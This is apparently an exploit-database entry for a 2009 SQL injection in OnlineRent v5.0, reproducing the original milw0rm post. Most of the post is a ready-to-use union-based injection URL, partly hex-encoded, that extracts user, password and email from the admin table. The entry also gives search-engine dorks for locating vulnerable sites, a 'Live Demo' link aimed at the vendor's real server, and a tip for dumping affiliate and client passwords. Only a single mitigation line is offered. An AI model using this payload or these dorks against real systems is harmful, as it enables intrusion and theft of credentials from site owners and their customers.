OnlineRent v5.0 Remote SQL injection

vendor:

OnlineRent

by:

UnderTaker HaCkEr

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: OnlineRent

Affected Version From: 5.0

Affected Version To: 5.0

Patch Exists: NO

Related CWE: N/A

CPE: a:online-rent:onlinerent:5.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

OnlineRent v5.0 Remote SQL injection

A vulnerability exists in OnlineRent v5.0 which allows an attacker to inject arbitrary SQL commands via the 'pid' parameter in the 'index.php' script. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as user credentials. The vulnerable parameter is 'pid' and the vulnerable script is 'index.php'. An example of the exploit is http://[TARGET]/[Path]/index.php?custom_language=turkish&user=detaliespopupcondrent&pid=1 AND 1=0 %75%6E%69%6F%6E SELECT 1,concat_ws(0x3e,user,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM admin--

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

---------------------------------------------------------------\
\                                				/
/              OnlineRent v5.0 Remote SQL injection             \
\                                				/
\---------------------------------------------------------------/


[*] Author    : UnderTaker HaCkEr

[*] Dork      : AÂ© MY LTD 2008 . ALL RIGHTS RESERVED

[*] Dork2     : allintitle:V45 TEMPLATE

[*] Vendor    : http://online-rent.com

[*] Exploit   : http://[TARGET]/[Path]/index.php?custom_language=turkish&user=detaliespopupcondrent&pid={SQL}

[*] Example   : http://[TARGET]/[Path]/index.php?custom_language=turkish&user=detaliespopupcondrent&pid=1 AND 1=0 %75%6E%69%6F%6E SELECT 1,concat_ws(0x3e,user,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM admin--

[*] Live Demo : http://www.online-rent.com/demo/index.php?custom_language=turkish&user=detaliespopupcondrent&pid=1 AND 1=0 %75%6E%69%6F%6E SELECT 1,concat_ws(0x3e,user,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM admin--

[*] Note      : You can grab the affiliates and clients passwords by just changing 'FROM admin' to 'FROM affiliates' or 'FROM clients'

[*] Email     : B-2@hotmail.com

[*] Friends   : s4s Hacker , Cold-z3ro , KANE HaCkEr , wzir al-Hacker , ReD-D3v1l , Brkod hacker , Net Boy , TiGer Net , NaiF HaCkEr , Dr,Mt3bny , Crazy Net

[*] Friends2  : MosTsHaR HaCkEr , his0k4 , Index HaCkEr , MiDNiGhT HaCkEr , Mr.JL6h , Dmar Network , Never HaCkEr , Dragon HaCkEr , Jhon Cena , MaDReDi 511
-----------------------------------------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2009-05-18]